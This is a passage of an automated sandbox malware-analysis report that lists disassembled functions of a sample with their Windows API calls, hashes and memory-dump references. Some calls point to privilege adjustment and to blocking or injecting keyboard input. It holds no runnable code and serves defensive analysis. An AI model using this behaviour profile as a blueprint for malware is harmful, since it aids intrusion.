                          • Opcode Fuzzy Hash: bb98524314c2a037e66ebfea2f7b54807d89789ff4faa0a5565de0600314b546
                          • Instruction Fuzzy Hash: 4F117C71E01228BBDB208F94DC45FAFBBBCEB45B50F108112F904E7290C2744A018BA5
                          Function 00761663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                          Download Yara Rule
                          APIs
                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0076168C
                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007616A1
                          • FreeSid.ADVAPI32(?), ref: 007616B1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: AllocateCheckFreeInitializeMembershipToken
                          • String ID:
                          • API String ID: 3429775523-0
                          • Opcode ID: b51c31df177adaf2c17a87f3fa3e33aaca8ff2b8a7e1f5cef9605a1e06c66630
                          • Instruction ID: ac7549ccc5c8ee9f817959462fdab2b6159ebb7ed2265c6e1d3a68305cadfecd
                          • Opcode Fuzzy Hash: b51c31df177adaf2c17a87f3fa3e33aaca8ff2b8a7e1f5cef9605a1e06c66630
                          • Instruction Fuzzy Hash: 0CF0F475950309FBDF00DFE4DD89AAEBBBCEB08604F508565EA01E2191E778AA448A54
                          Function 00724CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(007328E9,?,00724CBE,007328E9,007C88B8,0000000C,00724E15,007328E9,00000002,00000000,?,007328E9), ref: 00724D09
                          • TerminateProcess.KERNEL32(00000000,?,00724CBE,007328E9,007C88B8,0000000C,00724E15,007328E9,00000002,00000000,?,007328E9), ref: 00724D10
                          • ExitProcess.KERNEL32 ref: 00724D22
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Process$CurrentExitTerminate
                          • String ID:
                          • API String ID: 1703294689-0
                          • Opcode ID: c4c23de33297f6b4fd376916e4c73c87be7253b85888fcf766d055e50fe0a77f
                          • Instruction ID: ad93dfd98e904bbaec83f1b5e3db5a3aada71c04eb7a910d579deacfa29a106d
                          • Opcode Fuzzy Hash: c4c23de33297f6b4fd376916e4c73c87be7253b85888fcf766d055e50fe0a77f
                          • Instruction Fuzzy Hash: E9E0B631100558FFCF22AF64EE0AA583B69EB41B81F108019FD098B122CB3DDD42CA95
                          Function 0073C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID: /
                          • API String ID: 0-2043925204
                          • Opcode ID: 77284bd3506bf3118ea1f636f46a92fd12c33621e9f402076c908a1df6f6250d
                          • Instruction ID: ef00b73fd7670f600e6999ebb2e887c027d71aa884a8dc4009e3b74cd24d58df
                          • Opcode Fuzzy Hash: 77284bd3506bf3118ea1f636f46a92fd12c33621e9f402076c908a1df6f6250d
                          • Instruction Fuzzy Hash: 7A414972500218AFDB249FB9CC4DEBB7778EB84314F1042A9F905E7182E634AD81CB50
                          Function 0075D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                          Download Yara Rule
                          APIs
                          • GetUserNameW.ADVAPI32(?,?), ref: 0075D28C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: NameUser
                          • String ID: X64
                          • API String ID: 2645101109-893830106
                          • Opcode ID: 884a0ae5beef84997a172846a125f8bfdfae8039c52ab53cc3ea629b45af8732
                          • Instruction ID: 289dc7a90460b9b40cd78efbc4d810168c1ad9b355f64e78208a615faadabef4
                          • Opcode Fuzzy Hash: 884a0ae5beef84997a172846a125f8bfdfae8039c52ab53cc3ea629b45af8732
                          • Instruction Fuzzy Hash: 98D0C9B480111DEECFA0CB90DC88DDDB37CBB04305F104152F506A2140DBB899498F20
                          Function 0072CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                          • Instruction ID: 283849418078bdb791a0669487d4446f73bbead05e4b0fc4b7b59ea055573895
                          • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                          • Instruction Fuzzy Hash: 0C024D72E002299FDF15CFA9D9806ADFBF1EF58314F25816AD919E7380D734AA41CB90
                          Function 0070CAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID: Variable is not of type 'Object'.$p#}
                          • API String ID: 0-2137504428
                          • Opcode ID: 858f55caffe2b565ec23899024e49d55363f61a2687586dd63501aee7a90df85
                          • Instruction ID: 048f1b3eb16062c7b74ce798af5ce909c8943028fe5ae55286ce03ae5f3e36ae
                          • Opcode Fuzzy Hash: 858f55caffe2b565ec23899024e49d55363f61a2687586dd63501aee7a90df85
                          • Instruction Fuzzy Hash: 3732B070900209DBDF15DF94C885AEDB7F5FF05304F248259E806AB2C2DB79AE4ACB61
                          Function 007768EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(?,?), ref: 00776918
                          • FindClose.KERNEL32(00000000), ref: 00776961
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Find$CloseFileFirst
                          • String ID:
                          • API String ID: 2295610775-0
                          • Opcode ID: d118233975200738e78fa8c11ec0edb7117777f3b4f1a8b1a598c65dc3d161e8
                          • Instruction ID: 7bd91e504886c4c19ed825daf751acda940c09540675a6fb4bf825ac0dfd378e
                          • Opcode Fuzzy Hash: d118233975200738e78fa8c11ec0edb7117777f3b4f1a8b1a598c65dc3d161e8
                          • Instruction Fuzzy Hash: AD11AF71604601DFDB10CF29C488A16BBE0FF84328F04C69DE5698B2A6CB34FC05CB91
                          Function 007737B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00784891,?,?,00000035,?), ref: 007737E4
                          • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00784891,?,?,00000035,?), ref: 007737F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ErrorFormatLastMessage
                          • String ID:
                          • API String ID: 3479602957-0
                          • Opcode ID: 0e3abaa2a933768a0ce86b2267a6cd23dfe3904724397792abb19bffd6c99777
                          • Instruction ID: a1e40ddb0c13ca78dc4b011687fe583e3844748f45aef3a2f85fbb754d15ea39
                          • Opcode Fuzzy Hash: 0e3abaa2a933768a0ce86b2267a6cd23dfe3904724397792abb19bffd6c99777
                          • Instruction Fuzzy Hash: 1BF0E5B16052286AEF2027768C8DFEB3BAEEFC47A1F004265F509D2281DA749945C6F0
                          Function 0076B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0076B25D
                          • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 0076B270
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: InputSendkeybd_event
                          • String ID:
                          • API String ID: 3536248340-0
                          • Opcode ID: 3d2da09b7a9b79832f07000b6d89c9e34b6cd97ed0297daae7a6c633f68cff7f
                          • Instruction ID: 8c6d4368bf1ed30ca47700c265179c25b4a385d98c971355c21f2cb052e8e5d9
                          • Opcode Fuzzy Hash: 3d2da09b7a9b79832f07000b6d89c9e34b6cd97ed0297daae7a6c633f68cff7f
                          • Instruction Fuzzy Hash: 0AF01D7180428DAFDF059FA0C806BAE7BB4FF09305F10801AF955A5192D37D86519F94
                          Function 007610BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                          Download Yara Rule
                          APIs
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007611FC), ref: 007610D4
                          • CloseHandle.KERNEL32(?,?,007611FC), ref: 007610E9
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: AdjustCloseHandlePrivilegesToken
                          • String ID:
                          • API String ID: 81990902-0
                          • Opcode ID: 87ae119e5e2dcab80105b290fbcb8faca7625e7a9bc514185a9886c76f7bd280
                          • Instruction ID: b9d0b160cf9e949a0ec485d8914fa797fbeccec56b43463b988fbe4108d3a7e4
                          • Opcode Fuzzy Hash: 87ae119e5e2dcab80105b290fbcb8faca7625e7a9bc514185a9886c76f7bd280
                          • Instruction Fuzzy Hash: DBE0BF72018610EEEB262B55FD09EB777A9EB04310F14C82EF5A6804B1DB666CE1DB54
                          Function 0073676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00736766,?,?,00000008,?,?,0073FEFE,00000000), ref: 00736998
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ExceptionRaise
                          • String ID:
                          • API String ID: 3997070919-0
                          • Opcode ID: 742971870c6ed0ba55785ee8140d278427fe088dc443383e6509e39fe0beb8fc
                          • Instruction ID: cc0fab2389ba7a45aba82b7298f0f6e2e47c4a0176ade43954df9bd85759e910
                          • Opcode Fuzzy Hash: 742971870c6ed0ba55785ee8140d278427fe088dc443383e6509e39fe0beb8fc
                          • Instruction Fuzzy Hash: F8B12C71610609AFE715CF28C48ABA57BE0FF45364F25C658E8D9CF2A2C739E991CB40
                          Function 0071B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID: 0-3916222277
                          • Opcode ID: 2d5890819bfb61315dbaed9570a8b5346a04576adc1ad1e7091cf6b19e1424e5
                          • Instruction ID: 8a22d354e55fb25df1c29329fa619ea91b91d093520811e22832821f57431c5e
                          • Opcode Fuzzy Hash: 2d5890819bfb61315dbaed9570a8b5346a04576adc1ad1e7091cf6b19e1424e5
                          • Instruction Fuzzy Hash: 5C125F71900229DFDB54CF58C8806EEB7F5FF48710F14819AE849EB291EB789E85CB91
                          Function 0077EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • BlockInput.USER32(00000001), ref: 0077EABD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: BlockInput
                          • String ID:
                          • API String ID: 3456056419-0
                          • Opcode ID: 3fde775c4e798cde66a96bd8388b2977fc0571869e3ec04f7f9321c070f46c63
                          • Instruction ID: 963e8b5201a36433b32d196d83a6c41dc4fbcdea0dad3a3d7ff789e3946169ec
                          • Opcode Fuzzy Hash: 3fde775c4e798cde66a96bd8388b2977fc0571869e3ec04f7f9321c070f46c63
                          • Instruction Fuzzy Hash: 51E01A32200204DFCB10EF59D808E9AB7E9AF9D7A0F01C456FC49C7291DA78A8418B91
                          Function 007209D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                          Download Yara Rule
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,007203EE), ref: 007209DA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: 50e665e8b219447885da1c83d0cba2adfc3a77e7b8bfb80f86bbf2b1baa65842
                          • Instruction ID: d703a797928342138d5546fbbdaaa013681d218f7d386626b474f0fcaf9e199e
                          • Opcode Fuzzy Hash: 50e665e8b219447885da1c83d0cba2adfc3a77e7b8bfb80f86bbf2b1baa65842
                          • Instruction Fuzzy Hash:
                          Function 0072781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID: 0
                          • API String ID: 0-4108050209
                          • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                          • Instruction ID: 165eaa8e1ab9d77404ab4fa4c76b1a4ec884c5ed9837e2529eb17e5a490c76c4
                          • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                          • Instruction Fuzzy Hash: 5851797160C7759BDB3C8578BB9E7BE23999B12300F18050DE9C2DB282C61DEE81D356
                          Function 00772046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID: 0&}
                          • API String ID: 0-910209575
                          • Opcode ID: 7de6beec07c6d8d7f6ac8e9adef1ee298ef86a72ddede826677d7c49c78fd660
                          • Instruction ID: 320f1ef74768164018f07010d17f4718938b5a3e8f27150fa66dcb2e42e8871b
                          • Opcode Fuzzy Hash: 7de6beec07c6d8d7f6ac8e9adef1ee298ef86a72ddede826677d7c49c78fd660
                          • Instruction Fuzzy Hash: 8621A8327216118BDB28CF79C81267E73E5A764310F19CA2EE4A7C37D1DE39A905C794
                          Function 00736DD9 Relevance: .6, Instructions: 637COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 63c9806b3b2e628cede65ba276a0613d13e68530c5af9a3ae3489e316115d760
                          • Instruction ID: 4b73cb52583a0e08dcf4ed86eba3e5c74ce06cbc43148dfc147f4fb302c679d8
                          • Opcode Fuzzy Hash: 63c9806b3b2e628cede65ba276a0613d13e68530c5af9a3ae3489e316115d760
                          • Instruction Fuzzy Hash: 3E321362D29F414DE72B9638C8223356649AFB73C5F15D727E81AB5DA7EB2DC4C38100
                          Function 0071CC39 Relevance: .6, Instructions: 635COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 14620c4cd04780aee4a01c3d0fe6bfe60cfdfc753956e444d6a869885518e540
                          • Instruction ID: 9c9131c7025a3e0b35a6a48707e85508252542f51c2fdb0c1c25cb4542bbc540
                          • Opcode Fuzzy Hash: 14620c4cd04780aee4a01c3d0fe6bfe60cfdfc753956e444d6a869885518e540
                          • Instruction Fuzzy Hash: 3E321731A003058FDF26CEA8C4947FD7BA1EB45302F28856ADC49DB291E67CDD89DB94
                          Function 00707920 Relevance: .6, Instructions: 563COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8f02e6b4b92bb94e6d82461a265f9d35dea44164434903e777b90cc52010556c
                          • Instruction ID: 4f6cd95265e02e5a5f839d70245a26f32ea1e691ca29f4e7e06a330a68611c58
                          • Opcode Fuzzy Hash: 8f02e6b4b92bb94e6d82461a265f9d35dea44164434903e777b90cc52010556c
                          • Instruction Fuzzy Hash: A822A2B0E04609DFDF14CF68D845AAEB7F5FF44300F148629E816AB292EB39AD55CB50
                          Function 007091C0 Relevance: .5, Instructions: 475COMMON
                          Download Yara Rule
                          Memory Dump Source
